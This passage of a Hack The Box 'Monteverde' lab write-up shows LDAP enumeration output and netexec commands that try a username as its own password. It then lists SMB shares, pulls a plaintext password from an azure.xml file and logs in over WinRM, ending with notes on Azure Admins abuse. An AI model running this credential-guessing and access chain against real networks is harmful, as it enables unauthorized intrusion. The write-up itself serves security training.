LDAP        10.10.10.172    389    MONTEVERDE       CN=61b34cb0-55ee-4be9-b595-97810b92b017,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=57428d75-bef7-43e1-938b-2e749f5a8d56,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ebad865a-d649-416f-9922-456b53bbb5b8,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=0b7fb422-3609-4587-8c2e-94b10f67d1bf,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=2951353e-d102-4ea5-906c-54247eeec741,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=71482d49-8870-4cb3-a438-b6fc9ec35d70,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=aed72870-bf16-4788-8ac7-22299c8207f1,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=f58300d1-b71a-4DB6-88a1-a8b9538beaca,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=231fb90b-c92a-40c9-9379-bacfc313a3e3,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=4aaabc3a-c416-4b9c-a6bb-4b453ab1c1f0,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=9738c400-7795-4d6e-b19d-c16cd6486166,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=de10d491-909f-4fb0-9abb-4b7865c0fe80,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=b96ed344-545a-4172-aa0c-68118202f125,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=4c93ad42-178a-4275-8600-16811d28f3aa,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=c88227bc-fcca-4b58-8d8a-cd3d64528a02,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=5e1574f6-55df-493e-a671-aaeffca6a100,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=d262aae8-41f7-48ed-9f35-56bbb677573d,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=82112ba0-7e4c-4a44-89d9-d46c9612bf91,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=c3c927a6-cc1d-47c0-966b-be8f9b63d991,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=54afcfb9-637a-4251-9f47-4d50e7021211,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=f4728883-84dd-483c-9897-274f2ebcf11e,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ff4f9d27-7157-4cb0-80a9-5d6f2b14c8ff,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=83C53DA7-427E-47A4-A07A-A324598B88F7,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=C81FC9CC-0130-4FD1-B272-634D74818133,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=E5F9E791-D96D-4FC9-93C9-D53E1DC439BA,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=e6d5fd00-385d-4e65-b02d-9da3493ed850,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=3a6b3fbf-3168-4312-a10d-dd5b3393952d,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=7F950403-0AB3-47F9-9730-5D7B0269F9BD,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=434bb40d-dbc9-4fe7-81d4-d57229f7b080,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=A0C238BA-9E30-4EE6-80A6-43F731E9A5CD,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Windows2003Update,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ActiveDirectoryUpdate,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Password Settings Container,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=PSPs,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=TPM Devices,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Guest,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Administrators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Guests,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Print Operators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Backup Operators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Replicator,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Remote Desktop Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Network Configuration Operators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Performance Monitor Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Performance Log Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Distributed COM Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=IIS_IUSRS,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Cryptographic Operators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Event Log Readers,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Certificate Service DCOM Access,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=RDS Remote Access Servers,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=RDS Endpoint Servers,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=RDS Management Servers,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Hyper-V Administrators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Access Control Assistance Operators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Remote Management Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Storage Replica Administrators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Server,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=krbtgt,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Domain Computers,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Domain Controllers,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Schema Admins,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Enterprise Admins,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Cert Publishers,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Domain Admins,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Domain Users,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Domain Guests,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Group Policy Creator Owners,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=RAS and IAS Servers,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Server Operators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Account Operators,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Incoming Forest Trust Builders,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Windows Authorization Access Group,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Terminal Server License Servers,CN=Builtin,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6E157EDF-4E72-4052-A82A-EC3F91021A22,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Allowed RODC Password Replication Group,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Denied RODC Password Replication Group,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Read-only Domain Controllers,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Enterprise Read-only Domain Controllers,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Cloneable Domain Controllers,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Protected Users,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Key Admins,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Enterprise Key Admins,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=RID Manager$,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=RID Set,CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=DnsAdmins,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=DnsUpdateProxy,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=c.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=a.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=j.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=e.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=g.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=d.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=h.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=m.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=f.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=b.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=i.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=l.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       DC=k.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=DFSR-GlobalSettings,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Content,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=SYSVOL Share,CN=Content,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=MONTEVERDE,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=DFSR-LocalSettings,CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Domain System Volume,CN=DFSR-LocalSettings,CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=SQLServer2005SQLBrowserUser$MONTEVERDE,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=Service Accounts,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=MegaBank Computers,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ADSyncAdmins,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ADSyncOperators,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ADSyncBrowse,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ADSyncPasswordSet,CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=BCKUPKEY_c9afaf20-7c9e-4c9a-8b3c-a727e84a5265 Secret,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=BCKUPKEY_P Secret,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=BCKUPKEY_7edeff4e-1619-4fa9-915f-e0ee9ed3406a Secret,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=BCKUPKEY_PREFERRED Secret,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=svc-ata,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=svc-bexec,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=svc-netapp,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=File Server Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Call Recording Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Reception,OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Operations,OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Trading,OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=HelpDesk,OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Developers,OU=Groups,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL

Password Brute-force

We can try to use their username as password

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ netexec ldap 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.172    389    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

SABatchJobs SMB Enumeration

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ netexec smb 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [*] Enumerated shares
SMB         10.10.10.172    445    MONTEVERDE       Share           Permissions     Remark
SMB         10.10.10.172    445    MONTEVERDE       -----           -----------     ------
SMB         10.10.10.172    445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.10.10.172    445    MONTEVERDE       azure_uploads   READ            
SMB         10.10.10.172    445    MONTEVERDE       C$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       E$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.10.10.172    445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       users$          READ 

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ smbclient '//10.10.10.172/users$' -U 'MEGABANK.LOCAL\SABatchJobs'
Password for [MEGABANK.LOCAL\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 13:12:48 2020
  ..                                  D        0  Fri Jan  3 13:12:48 2020
  dgalanos                            D        0  Fri Jan  3 13:12:30 2020
  mhope                               D        0  Fri Jan  3 13:41:18 2020
  roleary                             D        0  Fri Jan  3 13:10:30 2020
  smorgan                             D        0  Fri Jan  3 13:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> 

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ tree .                                          
.
├── cred.txt
├── dgalanos
├── fulluser.txt
├── mhope
│   └── azure.xml
├── nmap
├── password.txt
├── roleary
├── smorgan
└── user.txt

5 directories, 6 files

By looking at azure.xml, we found a plaintext password

  
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ netexec smb 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'        
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ netexec winrm 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
WINRM       10.10.10.172    5985   MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)

Post-Exploitation

Bloodhound

mhope is member of Azure Admins, which we might can abuse due to the privileges of admins keyword.

winPEASx64

  
ÉÍÍÍÍÍÍÍÍÍÍ¹ Cloud Credentials
È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
    C:\Users\mhope\.azure\TokenCache.dat (Azure Token Cache)
    Accessed:1/3/2020 5:36:14 AM -- Size:7896                                                                                                                                                                                               

    C:\Users\mhope\.azure\AzureRMContext.json (Azure RM Context)
    Accessed:1/3/2020 5:35:57 AM -- Size:2794 

Abuse Azure Admins

references: https://blog.xpnsec.com/azuread-connect-for-redteam/

cybersecurity, ctf, htb

This post is licensed under CC BY 4.0 by the author.